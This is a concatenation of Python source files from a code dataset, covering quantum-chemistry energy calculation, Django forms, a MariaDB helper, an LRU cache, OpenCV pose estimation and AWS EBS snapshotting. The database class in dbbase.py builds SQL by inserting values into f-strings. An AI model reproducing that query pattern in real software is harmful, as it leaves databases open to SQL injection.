Unless your Orion worker instances have\n been setup to avoid sharing resources, the should remain set at 1.\"\"\",\n )\n\n guess_basis = BooleanParameter(\n \"guess_basis\",\n title=\"Basis set guess\",\n required=False,\n default=False,\n help_text=\"\"\"Psi4 advanced parameter: Accelerate convergence by performing a preliminary scf with this small \n basis set followed by projection into the full target basis. A value of TRUE turns on projection using the \n 3-21G small basis set.\n http://www.psicode.org/psi4manual/master/autodir_options_c/scf__basis_guess.html\"\"\",\n )\n\n use_soscf = BooleanParameter(\n \"use_soscf\",\n title=\"Use Second-Order SCF\",\n required=False,\n default=False,\n help_text=\"\"\"Psi4 advance parameter: Do use second-order SCF convergence methods?\n http://www.psicode.org/psi4manual/master/autodir_options_c/scf__soscf.html\"\"\",\n )\n\n scf_type = StringParameter(\n \"scf_type\",\n title=\"SCF Type\",\n required=False,\n default=\"DIRECT\",\n choices=[\"DIRECT\", \"DF\", \"PK\", \"OUT_OF_CORE\", \"PS\", \"INDEPENDENT\", \"GTFOCK\"],\n help_text=\"\"\"Psi4 parameter: SCF Type.\n \"\"\",\n )\n\n only_selected_conformer = BooleanParameter(\n \"only_selected_conformer\",\n title=\"Calculate Energy only for a selected conformer\",\n default=False,\n help_text=\"\"\"If this is set, energy is calculated only for a single \n conformer of each OEMol passed as input to this cube. The conformer for\n which the energy is calculated is determined by the 'SELECTED_CONFORMER'\n integer data tag on the OEMol.\"\"\",\n )\n\n molden_output = BooleanParameter(\n \"molden_output\",\n title=\"Attach electronic wave function from molden file as SD data\",\n default=False,\n help_text=\"\"\"If this is set, electronic wave function from\n molden file will be attached as SD data.\"\"\",\n )\n\n g_convergence = StringParameter(\n \"g_convergence\",\n title=\"Psi4 g_convergence parameter\",\n default=\"QCHEM\",\n choices=[\n \"QCHEM\",\n \"MOLPRO\",\n \"GAU\",\n \"GAU_LOOSE\",\n \"GAU_TIGHT\",\n \"INTERFRAG_TIGHT\",\n \"GAU_VERYTIGHT\",\n \"TURBOMOLE\",\n \"CFOUR\",\n \"NWCHEM_LOOSE\",\n ],\n help_text=\"\"\"Allows selection of a psi4 convergence criteria. See: http://www.psicode.org/psi4manual/master/autodoc_glossary_options_c.html#term-g-convergence-optking\"\"\",\n )\n\n max_disp_g_convergence = DecimalParameter(\n \"max_disp_g_convergence\",\n title=\"Psi4 max_disp_g_convergence parameter\",\n default=1.2e-3,\n help_text=\"\"\"Psi4 Maximum displacement convergence criteria. 
NOTE: For loose optimization, try 5.0e-2.\"\"\",\n )\n\n def begin(self):\n psi_path = which(\"psi4\")\n psi_path, tail = os.path.split(psi_path)\n psi_path, tail = os.path.split(psi_path)\n os.environ[\"PSI\"] = psi_path\n conda_path = \"/\".join(psi_path.split(\"/\")[:-1])\n os.environ[\"PSIPATH\"] = psi_path\n\n os.environ[\"PSI_SCRATCH\"] = tempfile.gettempdir()\n os.environ[\"PSI_SCRATCH_LOCAL\"] = tempfile.mkdtemp()\n\n psi4.set_memory(\"1 GB\")\n\n self.basis_guess_str = \"false\"\n if (\n self.args.guess_basis\n and self.args.spe_basis not in [\"sto-3g\", \"3-21G\", \"minix\"]\n and self.args.opt_basis not in [\"3-21G\", \"sto-3g\", \"minix\"]\n ):\n self.basis_guess_str = \"true\"\n\n self.use_soscf_str = \"false\"\n if (\n self.args.use_soscf\n and self.args.spe_basis not in [\"sto-3g\", \"3-21G\", \"minix\"]\n and self.args.opt_basis not in [\"3-21G\", \"sto-3g\", \"minix\"]\n ):\n self.use_soscf_str = \"true\"\n\n self.psi4opts = {\n \"scf_type\": self.args.scf_type,\n \"fail_on_maxiter\": \"false\",\n \"guess_basis\": self.basis_guess_str,\n \"use_soscf\": self.use_soscf_str,\n \"dft_radial_points\": self.args.dft_radial_points,\n \"dft_spherical_points\": self.args.dft_spherical_points,\n \"num_processors\": self.args.num_processors,\n \"g_convergence\": self.args.g_convergence,\n \"max_disp_g_convergence\": self.args.max_disp_g_convergence,\n }\n\n def end(self):\n if os.path.exists(os.environ[\"PSI_SCRATCH_LOCAL\"]):\n os.rmdir(os.environ[\"PSI_SCRATCH_LOCAL\"])\n\n def process(self, record, port):\n if record.has_value(self.args.in_mol_field):\n mol = record.get_value(self.args.in_mol_field)\n else:\n self.log.error(\"Could not find molecules in OEMolRecord\")\n self.failure.emit(record)\n return\n\n parent_torsion_tag = \"TORSION_ATOMS_ParentMol\"\n torsion_atoms_in_parent = get_sd_data(mol, parent_torsion_tag).split()\n dih_name = mol.GetTitle() + \"_\" + \"_\".join(torsion_atoms_in_parent)\n\n torsion_tag = \"TORSION_ATOMS_FRAGMENT\"\n torsion_atoms_in_fragment = get_sd_data(mol, torsion_tag).split()\n dihedral_atom_indices = [int(x) - 1 for x in torsion_atoms_in_fragment]\n if dihedral_atom_indices is None:\n self.log.warn(\"Unable to find labelled torsion in %s\" % dih_name)\n self.failure.emit(record)\n return\n\n opt_basis = self.args.opt_basis\n spe_basis = self.args.spe_basis\n\n # If fragment contains S\n # use 6-31+G* instead of 6-31G*\n # use 6-31+G** instead of 6-31G**\n need_diffuse = False\n if oechem.OECount(mol, oechem.OEIsSulfur()) > 0:\n need_diffuse = True\n\n for atom in mol.GetAtoms(oechem.OEIsHeavy()):\n if atom.GetFormalCharge() < 0:\n need_diffuse = True\n\n if need_diffuse:\n if opt_basis == \"6-31G*\":\n self.log.warn(\n \"Using 6-31+G* instead of 6-31G* as opt basis because fragment contains S.\"\n )\n opt_basis = \"6-31+G*\"\n\n if spe_basis == \"6-31G*\":\n self.log.warn(\n \"Using 6-31+G* instead of 6-31G* as spe basis because fragment contains S.\"\n )\n spe_basis = \"6-31+G*\"\n\n if opt_basis == \"6-31G**\":\n self.log.warn(\n \"Using 6-31+G** instead of 6-31G** as opt basis because fragment contains S.\"\n )\n opt_basis = \"6-31+G**\"\n\n if spe_basis == \"6-31G**\":\n self.log.warn(\n \"Using 6-31+G** instead of 6-31G** as spe basis because fragment contains S.\"\n )\n spe_basis = \"6-31+G**\"\n\n try:\n if self.args.only_selected_conformer:\n conf_selection_tag = \"SELECTED_CONFORMER\"\n key_conf_id = mol.GetIntData(conf_selection_tag)\n for conf in mol.GetConfs():\n if conf.GetIdx() != key_conf_id:\n continue\n conf_name = 
get_sd_data(conf, \"CONFORMER_LABEL\")\n else:\n conf_name = get_sd_data(mol, \"CONFORMER_LABEL\")\n time_stamp = \"{:%Y-%m-%d %H:%M:%S}\".format(datetime.datetime.now())\n hostname = socket.gethostname()\n self.log.info(\n \"Starting psi4 calculation for %s on %s at %s\"\n % (conf_name, hostname, time_stamp)\n )\n\n if self.args.only_selected_conformer:\n oechem.OESetSDData(conf, \"%s start time\" % self.name, time_stamp)\n else:\n oechem.OESetSDData(mol, \"%s start time\" % self.name, time_stamp)\n\n dih, _ = get_dihedral(mol, dihedral_atom_indices)\n calculate_energy(\n mol,\n dih,\n spe_method=self.args.spe_method,\n spe_basis=spe_basis,\n geom_opt_technique=self.args.geom_opt_technique,\n opt_method=self.args.opt_method,\n opt_basis=opt_basis,\n geom_maxiter=self.args.geom_maxiter,\n only_selected_conf=self.args.only_selected_conformer,\n molden_output=self.args.molden_output,\n **self.psi4opts\n )\n\n if self.args.only_selected_conformer:\n conf_selection_tag = \"SELECTED_CONFORMER\"\n key_conf_id = mol.GetIntData(conf_selection_tag)\n for conf in mol.GetConfs():\n if conf.GetIdx() != key_conf_id:\n continue\n conf_name = get_sd_data(conf, \"CONFORMER_LABEL\")\n else:\n conf_name = get_sd_data(mol, \"CONFORMER_LABEL\")\n time_stamp = \"{:%Y-%m-%d %H:%M:%S}\".format(datetime.datetime.now())\n hostname = socket.gethostname()\n self.log.info(\n \"Completed psi4 calculation for %s on %s at %s\"\n % (conf_name, hostname, time_stamp)\n )\n\n if self.args.only_selected_conformer:\n oechem.OESetSDData(conf, \"%s end time\" % self.name, time_stamp)\n else:\n oechem.OESetSDData(mol, \"%s end time\" % self.name, time_stamp)\n\n optimized_mol_record = OEMolRecord()\n optimized_mol_record.set_mol(mol)\n self.success.emit(optimized_mol_record)\n except Exception as e:\n print(e)\n # traceback.print_stack()\n self.log.error(\"Error with {} {}\".format(mol.GetTitle(), e))\n self.failure.emit(record)\n\n\nclass ParallelPsi4EnergyCalculation(ParallelMixin, Psi4EnergyCalculation):\n title = \"Calculate Psi4 Energy (Parallel)\"\n\n parameter_overrides = {\n \"prefetch_count\": {\"default\": 1}, # 1 molecule at a time\n \"item_timeout\": {\n \"default\": 43200.0\n }, # Default 12 hour limit (units are seconds)\n \"item_count\": {\"default\": 1}, # 1 molecule at a time\n \"max_failures\": {\"default\": 1}, # only 1 failure permitted\n }\n\n def process_failed(self, data, port, last_error):\n print(\n \"Parallel cube failed to process {} from {} with error: {}\".format(\n data, port, last_error\n )\n )\n self.system_failure.emit(data)\n","sub_path":"torsion/cubes/calculate_energy.py","file_name":"calculate_energy.py","file_ext":"py","file_size_in_byte":15410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"559744137","text":"\"\"\"\nHere we define a form for allowing site users to submit a potential FAQ that\nthey would like to see added.\n\nFrom the user's perspective the question is not added automatically, but\nactually it is, only it is added as inactive.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom django import forms\nfrom .models import Experiment, Inventory, Herb, Peptide\n\nfrom suit.widgets import SuitDateWidget, SuitTimeWidget, SuitSplitDateTimeWidget, AutosizedTextarea, HTML5Input\nfrom .widget import AdvancedThumbnailImageWidget, ScientificNameWidget, FormDateWidget\nfrom django.forms.widgets import ClearableFileInput\n\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.forms.extras.widgets import 
SelectDateWidget\nfrom tinymce.widgets import TinyMCE\n\nclass InventoryForm(forms.ModelForm):\n class Meta:\n model = Inventory\n fields = ['herb', 'supplier', 'storage_location', 'price', 'purchase_quantity', 'processing_method', 'remarks']\n widgets = {\n #'date_of_update': FormDateWidget,\n #'expire_date': FormDateWidget,\n #'date_of_receive': FormDateWidget,\n 'remarks': forms.Textarea(attrs={'rows':5}),\n }\n\n\nclass ExperimentForm(forms.ModelForm):\n class Meta:\n model = Experiment\n exclude = ['uploaded_by', 'created_time']\n widgets = {\n 'description': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'condition': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n #'parameter': forms.Textarea(attrs={'rows':2, 'cols':25}),\n 'experiment_time': FormDateWidget,\n }\n\n\nclass HerbForm(forms.ModelForm):\n class Meta:\n model = Herb\n fields = ['scientific_name', 'common_name', 'literature', 'remarks']\n widgets = {\n #'image': AdvancedThumbnailImageWidget,\n 'scientific_name': ScientificNameWidget(attrs={'width': 125}),\n 'literature': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n #'remarks': AutosizedTextarea(attrs={'rows': 3}),\n }\n\n\nclass PeptideForm(forms.ModelForm):\n class Meta:\n model = Peptide\n fields = ['sample_name', 'description', 'extraction_method', 'synthesis_method', 'sequence', 'structure_text',\n 'structure_picture', 'structure_link', 'quantity', 'owner', 'unit', 'notebook_number', 'origin', 'storage_method', 'storage_location',\n 'hplc_data_text', 'hplc_data_file', 'ms_data_text', 'ms_data_file', 'remarks', 'remarks_file']\n widgets = {\n 'structure_picture': AdvancedThumbnailImageWidget,\n 'description': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'literature': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'sequence': TinyMCE(attrs={'cols': 25, 'rows': 1}),\n #'remarks': AutosizedTextarea(attrs={'rows': 3}),\n }","sub_path":"herbprofile/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334341686","text":"from Прочее.truck import Truck\n\n\nclass NotMachineLikeTruckAcceptableInGarage(Exception):\n\n text = '''\n !!!!!!!!!!!!!!!!!!!!!!\n !!!!!! Only trucks are acceptable to be parked in this garage {} !!!!!!!!!!!!\n !!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotMachineLikeTruckAcceptableInGarage.text.format(message)\n\nclass NotVolvoFMXInBox(NotMachineLikeTruckAcceptableInGarage):\n\n text = '''!!!!!!!!!!!!!!!!!!!!!!!\n !!!!!!!!!!!! One or more trucks you have parked are not VolvoFMX model !!!!!!!!!!!!!\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotVolvoFMXInBox.text.format(message)\n\nclass NotVolvoFEInBox(NotMachineLikeTruckAcceptableInGarage):\n\n text = '''!!!!!!!!!!!!!!!!!!!!!!!\n !!!!!!!!!!!! 
One or more trucks you have parked are not VolvoFE model !!!!!!!!!!!!!\n    !!!!!!!!!!!!!!!!!!!!!!!!!!!!\n    '''\n\n    def __init__(self, message):\n        self.message = NotVolvoFEInBox.text.format(message)\n\nclass Garage:\n\n    def __init__(self, number, volume, list1, list2):\n        self.number = number\n        self.volume = volume\n        self.cars_list = list1\n        self.trucks_list = list2\n\n    def setTrucks(self, trucks):\n        for truck in trucks:\n            if (isinstance(truck, Truck)):  # If it is a truck, add it to the list\n                self.trucks_list.append(truck)\n            else:\n                raise NotMachineLikeTruckAcceptableInGarage(truck.type)\n\nclass Garage_Box(Garage):\n\n    def __init__(self, number, list1):\n        self.number = number\n        self.trucks_list = list1\n\n    def setVolvoFMXBox(self, trucks):\n        for truck in trucks:\n            if truck.model == 'FMX':\n                self.trucks_list.append(truck)\n            else:\n                raise NotVolvoFMXInBox(truck.model)\n\n    def setVolvoFEBox(self, trucks):\n        for truck in trucks:\n            if truck.model == 'FE':\n                self.trucks_list.append(truck)\n            else:\n                raise NotVolvoFEInBox(truck.model)\n\n\n\n","sub_path":"M.Shirinskiy/Garage/Garage.py","file_name":"Garage.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"346199190","text":"def gen_convert_command(x):\n    fcodes = [\"phv\", \"jvn\", \"cs\", \"cm\", \"\"]\n    svg = '.svg'\n    size = 256\n    for code in fcodes:\n        ccode = code + svg\n        if ( len(ccode) < len(x)):\n            diff = len(x) - len(ccode)\n            ext = x[diff:]\n            if (ccode == ext):\n                fromName = x\n                toName = x[:diff];\n                if code: toName += '_'+ code\n                toName += '.png'\n                #inkscape -z -e test.png -w 1024 -h 1024 test.svg\n                #cmd = \"convert %s %s\"%(fromName, toName)\n                cmd = 'inkscape -z -e \"pngs/%s\" -w %d \"%s\" -y 1.0 -b #ffffff'%(toName, size, fromName)\n                return cmd\n    return 'echo \"Do nothing\"'\n\n\n\nfnames = open(\"files.list\", \"r\")\nnames = list(map(lambda x: x.strip(), fnames))\n\ncmds = list(map(gen_convert_command, names))\nfor cmd in cmds:\n    print(cmd)\n\n\n","sub_path":"sandbox/images/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"213761698","text":"import sys\nimport time\nfrom datetime import datetime\nfrom time import mktime\nfrom typing import List, Tuple\n\nimport mariadb\n\nfrom config import Cfg\n\n\nclass Db(Cfg):\n\n    rz_conn = None  # TO-DO: make a typing on db Connection\n    gz_conn = None  # TO-DO: make a typing on db Connection\n\n    def __init__(self):\n        \"\"\"\n        Create an instance of the configuration file\n        \"\"\"\n        super(Db, self).__init__()\n        self.gz_conn = self._db_conn(\n            user=self.user,\n            password=self.password,\n            host=self.host,\n            port_str=self.port,\n            database=self.gz_db,\n        )\n        self.rz_conn = self._db_conn(\n            user=self.user,\n            password=self.password,\n            host=self.host,\n            port_str=self.port,\n            database=self.rz_db,\n        )\n\n    def _db_conn(\n        self, user: str, password: str, host: str, port_str: str, database: str\n    ):\n        \"\"\"\n        Establish connection to mariadb platform\n        \"\"\"\n        try:\n            conn = mariadb.connect(\n                user=user,\n                password=password,\n                host=host,\n                port=int(port_str),\n                database=database,\n            )\n        except mariadb.Error as e:\n            print(f\"Error connecting to MariaDB Platform: {e}\")\n            sys.exit(1)\n        return conn\n\n    def get_device_variables_by_name(self, device_name: str):\n        # Get Cursor\n        result: List[str] = []\n        cur = self.gz_conn.cursor()\n\n        query = f\"\"\"\n            SELECT v.name\n            FROM 
device d, variable v, device_variable dv\n WHERE\n d.device_id = dv.device_id\n and dv.variable_id = v.variable_id\n AND d.name = '{device_name}'\n \"\"\"\n # Read devices of database\n cur.execute(query)\n query_result = cur.fetchall()\n for item in query_result:\n result.append(item[0])\n # Convert to list\n\n return result\n\n def get_devices_all(self):\n # Get Cursor\n cur = self.gz_conn.cursor()\n # Read devices of database\n cur.execute(\"SELECT * FROM device\")\n result = cur.fetchall()\n return result\n\n def get_device_data_by_name(self, device_name: str):\n # Get Cursor\n cur = self.gz_conn.cursor() # TO-DO: typing for cursor variable\n # Read devices of database\n query: str = f\"SELECT * FROM device WHERE name = '{device_name}'\"\n\n cur.execute(query)\n r = cur.fetchone() # TO-DO: typing this tuple\n\n d: dict[str:str] = {\n \"name\": r[1],\n \"brand\": r[2],\n \"model\": r[3],\n \"ext_device_id\": r[4],\n \"url\": r[5],\n \"access_token\": r[6],\n }\n\n return d\n\n def write_climate_logger_device_data(\n self, ext_device_id: str, timestamp_str: str, temperature: int, humidity: int\n ):\n\n # convert timestap to datetime\n timestamp: datetime = datetime.fromtimestamp(\n mktime(time.strptime(timestamp_str, \"%a %b %d %H:%M:%S %Y\"))\n )\n\n # Get Cursor\n cur = self.rz_conn.cursor()\n query: str = f\"\"\"\n INSERT INTO climatedata (ext_device_id, timestamp, temperature, humidity)\n VALUES ('{ext_device_id}', '{timestamp.strftime('%Y-%m-%d %H:%M:%S')}', {float(temperature)}, {float(humidity)})\n \"\"\"\n cur.execute(query)\n cur.execute(\"COMMIT\")\n\n\nif __name__ == \"__main__\":\n DB = Db()\n print(DB.get_device_data_by_name(\"climate-logger-01\"))\n","sub_path":"src/dbbase.py","file_name":"dbbase.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"69271812","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1353/A\n# 最大的放一个,两边各一个0?\n\nt = int(input())\nfor _ in range(t):\n n,m = list(map(int,input().split()))\n l = [0,m,m<<1]\n print(l[n-1] if n<=2 else l[2])\n","sub_path":"codeforces/math数学/800/1353A最大化相邻差.py","file_name":"1353A最大化相邻差.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"110335881","text":"\n# @Title: LRU 缓存机制 (LRU Cache)\n# @Author: 18015528893\n# @Date: 2021-02-28 17:17:13\n# @Runtime: 196 ms\n# @Memory: 23.4 MB\n\nclass Node:\n \n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.next = None\n self.prev = None\n\n\nclass DoubleList:\n\n def __init__(self):\n self.head = Node(0, 0)\n self.tail = Node(0, 0)\n self.head.next = self.tail\n self.tail.prev = self.head\n self.size = 0\n\n def remove(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n self.size -= 1\n \n def remove_first(self):\n if self.head.next == self.tail:\n return\n first = self.head.next\n self.remove(first)\n return first\n\n def add_last(self, node):\n node.prev = self.tail.prev\n node.next = self.tail\n node.prev.next = node\n self.tail.prev = node\n self.size += 1\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.map = dict()\n self.cache = DoubleList()\n self.capacity = capacity \n\n def get(self, key: int) -> int:\n if key not in self.map:\n return -1\n self.make_recent(key)\n return self.map[key].val\n\n def put(self, key: int, value: int) -> None:\n if key in self.map:\n self.delete_key(key)\n 
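            # Updating an existing key: delete_key() above unlinks the stale node,
            # and add_recent() below appends a fresh node at the tail of the
            # doubly linked list (the most-recently-used end), so put() stays O(1).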
self.add_recent(key, value)\n            return\n        \n        if self.capacity == len(self.map):\n            self.remove_least_recent()\n\n        self.add_recent(key, value)\n\n    def make_recent(self, key):\n        node = self.map[key]\n        self.cache.remove(node)\n        self.cache.add_last(node)\n    \n    def add_recent(self, key, val):\n        node = Node(key, val)\n        self.cache.add_last(node)\n        self.map[key] = node\n\n    def delete_key(self, key):\n        node = self.map[key]\n        self.cache.remove(node)\n        del self.map[key]\n    \n    def remove_least_recent(self):\n        node = self.cache.remove_first()\n        del self.map[node.key]\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n","sub_path":"Problemset/lru-cache/lru-cache.py","file_name":"lru-cache.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
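A minimal usage sketch of the LRUCache class above, added for illustration (it is not part of the original record): with capacity 2, a get() refreshes an entry's recency, so the next put() past capacity evicts the other key.

cache = LRUCache(2)
cache.put(1, 1)
cache.put(2, 2)
assert cache.get(1) == 1   # key 1 becomes the most recently used entry
cache.put(3, 3)            # cache is full: key 2, the least recently used, is evicted
assert cache.get(2) == -1  # key 2 is gone
assert cache.get(3) == 3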
+{"seq_id":"483880178","text":"from Utils.POSE3 import Pose3\nimport abc\nimport subprocess\nimport os\nimport json\nimport numpy as np\nfrom Feature2D.SIFTFeature import *\nfrom pytypes import override\nimport cv2\nimport typing\n\n\nclass PnPBase(object):\n    __metaclass__ = abc.ABCMeta\n\n    def __init__(self) -> None:\n        pass\n\n    def getPoseRef2Cur(self, refImg : np.ndarray, curImg: np.ndarray, curImg_depth:np.ndarray, K: np.ndarray) -> (Pose3, np.ndarray, np.ndarray):\n        pose = Pose3()\n        p_ref, p_cur = None, None\n        return pose, p_ref, p_cur\n\nclass PnP_CV(PnPBase):\n    def __init__(self):\n        super(PnP_CV, self).__init__()\n\n    def get3dPoint(cls, imgpt, depth, K):\n        imgpt_homo = np.matrix([imgpt[0], imgpt[1], 1]).T\n        K_i = np.matrix(K).I\n        pt3d = (K_i * imgpt_homo * depth).ravel()\n        return pt3d\n\n    def get3dPoints(cls, ref_pts, cur_pts, curImg_depth, K):\n        # get valid data\n        valid_ref_pts = []\n        valid_cur_pts = []\n        valid_cur_depth = []\n        for i in range(0, len(ref_pts)):\n            x = int(cur_pts[i, 0])\n            y = int(cur_pts[i, 1])\n            if curImg_depth[y, x] == 0:  # invalid depth\n                continue\n            valid_ref_pts.append(ref_pts[i])\n            valid_cur_pts.append(cur_pts[i])\n            valid_cur_depth.append(curImg_depth[y, x])  # note: first y:height , then x:width\n\n        # convert 2d image points to 3d points\n        valid_cur_pts3d = []\n        for i in range(0, len(valid_cur_pts)):\n            pt3d = cls.get3dPoint(valid_cur_pts[i], valid_cur_depth[i], K)\n            valid_cur_pts3d.append(pt3d)\n\n        return np.float32(valid_ref_pts), np.float32(valid_cur_pts), np.float32(valid_cur_pts3d)\n\n    # @override\n    def getPoseRef2Cur(self, refImg: np.ndarray, curImg: np.ndarray, curImg_depth: np.ndarray, K: np.ndarray):\n        ref_pts, cur_pts = SIFTFeature.detectAndMatch(image1=refImg,image2=curImg)\n        ref_pts_2d, cur_pts_2d, cur_pts_3d = self.get3dPoints(ref_pts, cur_pts, curImg_depth, K)\n\n        # solvePnPRansac(A, B) -> Pose_B = Relative_Pose_A2B * Pose_A\n        retval, rvec, tvec, inlier = cv2.solvePnPRansac(cur_pts_3d, ref_pts_2d, K, None, flags=cv2.SOLVEPNP_EPNP)\n\n        if retval == True:\n            R, jacobian = cv2.Rodrigues(rvec)\n            pose_cur2ref = Pose3.fromRt(R, tvec)\n\n            pose_ref2cur = pose_cur2ref.inverse()\n            return pose_ref2cur, ref_pts_2d, cur_pts_2d\n        else:\n            return Pose3(), ref_pts_2d, cur_pts_2d\n\ndef testPnP_CV():\n    print(\"Test PnP in OpenCV:\")\n    pnp = PnP_CV()\n    im_dir = \"\"\n    refImg = cv2.imread(os.path.join(im_dir, '1_ref.png'))\n    curImg = cv2.imread(os.path.join(im_dir, '1_cur.png'))\n    curImg_depth = cv2.imread(os.path.join(im_dir, '1_cur_depth.png'), cv2.IMREAD_UNCHANGED)\n\n    leftK = np.float32([[320, 0, 320], [0, 320, 240], [0, 0, 1]])\n    pose, p_ref, p_cur = pnp.getPoseRef2Cur(refImg, curImg, curImg_depth, leftK)\n\n\n    print(\"Pose computed using PnP:\")\n    pose.display()\n\n\nif __name__ == \"__main__\":\n    # testPnP_MVG()\n    testPnP_CV()\n\n","sub_path":"RelativePose/ComputePnP.py","file_name":"ComputePnP.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"437076999","text":"# Copyright © 2020 Novobi, LLC\n# See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models, _\n\n\nclass MrpProductProduce(models.TransientModel):\n    _inherit = \"mrp.product.produce\"\n\n    def action_generate_serial(self):\n        \"\"\"\n        Override to add name when generating lot.\n        \"\"\"\n        self.ensure_one()\n        product_produce_wiz = self.env.ref('mrp.view_mrp_product_produce_wizard', False)\n        lot_name = self.env['stock.production.lot'].with_context(create_finished_product_lot=True).generate_lot_name()\n        self.finished_lot_id = self.env['stock.production.lot'].create({\n            'name': lot_name,\n            'product_id': self.product_id.id,\n            'company_id': self.company_id.id,\n        })\n        return {\n            'name': _('Produce'),\n            'type': 'ir.actions.act_window',\n            'view_mode': 'form',\n            'res_model': 'mrp.product.produce',\n            'res_id': self.id,\n            'view_id': product_produce_wiz.id,\n            'target': 'new',\n        }","sub_path":"pcp_mrp/wizard/mrp_product_produce.py","file_name":"mrp_product_produce.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"6114095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: example.py\n# @Date: 2019-06-30-15-21\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport autograd.numpy as np\nimport gym\n\nimport trajopt\nfrom trajopt.envs.quanser.cartpole.ctrl import SwingUpCtrl\n\n\n# quanser cartpole env\nenv = gym.make('Quanser-Cartpole-v0')\nenv._max_episode_steps = 1000000\n\nctrl = SwingUpCtrl()\n\nobs = env.reset()\nfor n in range(500):\n    act = ctrl(obs)\n    obs, _, done, _ = env.step(act)\n    if done:\n        break\n\n    if np.mod(n, 50) == 0:\n        env.render()\n","sub_path":"rl/envs/control/quanser/cartpole/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
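The record that follows polls EC2 state in hand-rolled time.sleep() loops. As a hedged alternative sketch (not part of the original file; snapshot_volume is a hypothetical helper name), boto3's built-in waiters on the ec2 resource objects express the same stop, snapshot, restart sequence more concisely:

import boto3

ec2 = boto3.resource('ec2')

def snapshot_volume(instance_id, volume_id):
    # Stop the instance and block until it reports 'stopped'.
    instance = ec2.Instance(instance_id)
    instance.stop()
    instance.wait_until_stopped()

    # Snapshot the volume and block until the snapshot is 'completed'.
    snapshot = ec2.create_snapshot(VolumeId=volume_id, Description=instance_id)
    snapshot.wait_until_completed()

    # Bring the instance back up.
    instance.start()
    instance.wait_until_running()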
+{"seq_id":"140125698","text":"#!/usr/bin/python3\nimport boto3 \nimport time\n\nfrom collections import defaultdict\n\nclass Snapshot:\n    def __init__(self):\n        self.ec2_resource = boto3.resource('ec2')\n        self.ec2_client = self.ec2_resource.meta.client\n        self.filters = [{ 'Name': 'tag:backup', 'Values': ['true']}] \n        self.instances_matching_filters = self.ec2_client.describe_instances(Filters=self.filters)\n    ##Return list of ec2 instances matching filters above\n    def list_matching_instances(self):\n        instance_list = defaultdict(list)\n        for i in (self.instances_matching_filters[\"Reservations\"]):\n            for instance in i[\"Instances\"]: \n##Add InstanceId as key and value\n                instance_list[(instance[\"InstanceId\"])].append(instance[\"InstanceId\"])\n                ##Add volume id's as values to InstanceId key\n                for x in instance[\"BlockDeviceMappings\"]:\n                    instance_list[(instance[\"InstanceId\"])].append(x[\"Ebs\"][\"VolumeId\"])\n        return instance_list\n    def snapshot(self, volume_id, description):\n        self.ec2_resource.create_snapshot(VolumeId=volume_id, Description=description)\n    \n    def stop_instance(self, instance_id):\n        self.ec2_resource.Instance(instance_id).stop()\n    \n    ##Snapshot list must have instance ID first, and then volume IDs\n    def snapshot_matching_instances(self):\n        instance_list = self.list_matching_instances()\n        for k,v in instance_list.items():\n            instance_id = v.pop(0)\n            self.stop_instance(instance_id)\n            while self.ec2_resource.Instance(instance_id).state['Name'] != \"stopped\":\n                time.sleep(5)\n                print(\"waiting for instance \" + instance_id + \" to stop\")\n            for i in v:\n                snapshot = self.ec2_resource.create_snapshot(VolumeId=i,Description=instance_id)\n                while snapshot.state != 'completed':\n                    time.sleep(10)\n                    snapshot.load()\n                    print(\"Waiting for snapshot for \" + instance_id + \" to complete\")\n                else:\n                    continue\n            self.ec2_resource.Instance(instance_id).start()\n            while self.ec2_resource.Instance(instance_id).state['Name'] != \"running\":\n                time.sleep(5)\n                print(\"waiting for instance \" + instance_id + \" to start\") \n\nif __name__ == \"__main__\":\n    a = Snapshot()\n    b = a.snapshot_matching_instances()\n","sub_path":"create_aws_snapshots.py","file_name":"create_aws_snapshots.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
